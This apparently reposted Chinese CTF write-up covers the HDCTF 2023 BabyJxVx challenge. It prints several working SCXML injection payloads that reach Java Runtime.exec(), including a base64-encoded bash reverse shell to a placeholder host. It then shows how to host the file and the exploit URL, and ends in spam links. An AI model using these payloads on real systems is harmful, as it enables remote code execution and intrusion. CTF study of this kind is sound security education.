当前位置: 首页 > wzjs >正文

怎么建设电影网站合肥市住建局官方网

wzjs 2025/9/11 3:31:19
怎么建设电影网站,合肥市住建局官方网,做公司网站需要注意什么,百度快速seo优化文章目录 前言源码利用上传恶意xml文件构造payload搭建Apache服务器 远程RCE 前言 在做 [HDCTF 2023]BabyJxVx 遇到的知识点,但是没公网的服务器只能作罢,写下这篇文章记录 源码利用 public String Flag(RequestParam(required true) String filenam…

文章目录

  • 前言
  • 源码利用
  • 上传恶意xml文件
    • 构造payload
    • 搭建Apache服务器
  • 远程RCE

前言

在做 [HDCTF 2023]BabyJxVx 遇到的知识点,但是没公网的服务器只能作罢,写下这篇文章记录

源码利用

public String Flag(@RequestParam(required = true) String filename) {SCXMLExecutor executor = new SCXMLExecutor();try {if (check(filename)) {SCXML scxml = SCXMLReader.read(filename);executor.setStateMachine(scxml);executor.go();return "Revenge to me!";}System.out.println("nonono");} catch (Exception var4) {System.out.println(var4);}return "revenge?";
}

大概考点就是接收filename参数,然后利用SCXMLReader.read()方法来读取恶意xml

上传恶意xml文件

构造payload

shell.xml源码

<?xml version="1.0"?>
<scxml xmlns="http://www.w3.org/2005/07/scxml" version="1.0" initial="run"><final id="run"><onexit><assign location="flag" expr="''.getClass().forName('java.lang.Runtime').getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC9wb3J0IDA+JjE=}|{base64,-d}|{bash,-i}')"/></onexit></final>
</scxml>
  • <scxml xmlns="http://www.w3.org/2005/07/scxml" version="1.0" initial="run"> :定义了一个 SCXML 状态机,其中 xmlns属性指定了命名空间,version属性指定了版本,initial 属性指定了初始状态为 run。
  • <final id="run">:定义了一个状态,它是最终状态,它的 id 属性为 run。
  • <onexit>:定义了一个事件,在退出状态时触发
  • <assing........> : location 属性指定了要赋值的变量名称,expr 属性指定了要赋给变量的值。

除此之外还有很多构造的

<?xml version="1.0"?> 
<scxml xmlns="http://www.w3.org/2005/07/scxml" version="1.0" initial="run"><state id="run"><onentry> <script> ''.getClass().forName('java.lang.Runtime').getRuntime().exec('calc')</script></onentry></state>
</scxml>

<?xml version="1.0"?>
<scxml xmlns="http://www.w3.org/2005/07/scxml" version="1.0" initial="run"><state id="run"><onentry><if cond="''.getClass().forName('java.lang.Runtime').getRuntime().exec('calc')"></if></onentry></state>
</scxml>

<?xml version="1.0"?>
<scxml xmlns="http://www.w3.org/2005/07/scxml" version="1.0" initial="run"><datamodel><data id="flag" expr="''.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')"></data></datamodel>
</scxml>

<?xml version="1.0"?>
<scxml xmlns="http://www.w3.org/2005/07/scxml" version="1.0" initial="run"><parallel><invoke src="test" content="test" id="flag"> <param name="flag" expr="''.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')"></param></invoke></parallel>
</scxml>

<?xml version="1.0"?>
<scxml xmlns="http://www.w3.org/2005/07/scxml" version="1.0" initial="run"><state><history src="test" content="test" id="flag"><transition name="flag" cond="''.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')"></transition></history></state>
</scxml>

搭建Apache服务器

首先我们得在本地搭建服务器,这里我以kali为例
依次执行以下命令

sudo apt-get updatesudo apt-get install apache2sudo service apache2 start    #启动服务

然后我们在浏览器访问http://ip
在这里插入图片描述
然后我们将写好的xml文件mv到该根目录下

mv /home/kali/shell.xml /var/www/html/

上传成功后我们开启临时文件服务器,在根目录执行下面命令

python3 -m http.server 8000

在这里插入图片描述
访问8000端口,成功访问
在这里插入图片描述

远程RCE

我们直接在题目处远程RCE,payload如下

http://node4.anna.nssctf.cn:28342/Flag?filename=http://服务器ip:8000/shell.xml

文章转载自:

http://pXzvTr6k.ntnmL.cn
http://Aqqxbjsk.ntnmL.cn
http://IXW7kRsz.ntnmL.cn
http://cVCAP00G.ntnmL.cn
http://SUZ1mFgt.ntnmL.cn
http://pQnE3N2R.ntnmL.cn
http://oOQqJtsW.ntnmL.cn
http://qDXzMFLE.ntnmL.cn
http://Hw7A2246.ntnmL.cn
http://YvnFR33i.ntnmL.cn
http://rsPMQ0ny.ntnmL.cn
http://xB7CifBO.ntnmL.cn
http://sn3cOGCi.ntnmL.cn
http://TPPXYgEM.ntnmL.cn
http://2FNMrZuq.ntnmL.cn
http://qeWYnKxL.ntnmL.cn
http://pp8hugv4.ntnmL.cn
http://ZYLYjvnr.ntnmL.cn
http://srD3MEKJ.ntnmL.cn
http://DPxY8Rm4.ntnmL.cn
http://ojQ5SsUU.ntnmL.cn
http://cZ6Xufzb.ntnmL.cn
http://L5aNhn5V.ntnmL.cn
http://VxQdy3OJ.ntnmL.cn
http://ut66Is5z.ntnmL.cn
http://FZkBLwHS.ntnmL.cn
http://6ZM2hGTm.ntnmL.cn
http://8QDbyek7.ntnmL.cn
http://H5V5q8C8.ntnmL.cn
http://bmtgsDsb.ntnmL.cn
http://www.dtcms.com/wzjs/687910.html

相关文章:

  • 网站外部链接做多少合适呢公司在网站做广告怎么做分录
  • php网站怎么做缓存营销型网站建设的主要流程包括
  • 支付宝网站开发流程网站技建设费计入什么科目
  • 阿里云 ip 网站wordpress搜索表单
  • 湖南英文网站建设企业网站的建设的目标人物是
  • 建设网站要多久到账免费的seo教程
  • 上海家装设计网站网页设计与制作步骤流程
  • 品牌网站建设小蝌蚪1返佣网站都是自己做的
  • 仿视频网站开发智能小程序开发
  • 如何建小企业网站深圳网络推广工资
  • 邯郸做网站的公司建设公司是什么意思
  • iis网站asp.net部署wordpress菜单页面跳转
  • 石家庄免费网站建设腾讯的wordpress怎么样
  • 广西省建设注册管理网站公司注册域名需要哪些条件
  • 网上商城网站开发公司如何做赚钱的网站
  • 电子商务网站开发的任务书我局 负责 建设 网站
  • 长沙网站建设260ewordpress在线
  • 网站前端设计培训黄石网站网站建设
  • dw做网站首页长宽设置多少腾讯云主机
  • 好看的ui网站页面设计有找专业做淘宝网站的美工
  • 电商网站建设的现实意义是什么主题公园网站建设
  • 百度收录检测如何优化网站标题
  • 网站建设中标公告如何使用云服务建设网站
  • 大连科技学院官方网站的建设与放店铺logo在线免费制作
  • 福州网站制作有限公司网站开发报价单
  • 做网站的网站赚钱吗外发加工会计分录
  • 德兴市网站建设服务公司成都seo培训班
  • 毕业设计可以做自己的网站吗住房和城乡建设岗位证书
  • 长垣做网站两学一做教育纪实评价系统网站
  • 室内装饰设计师证书seo推广营销网站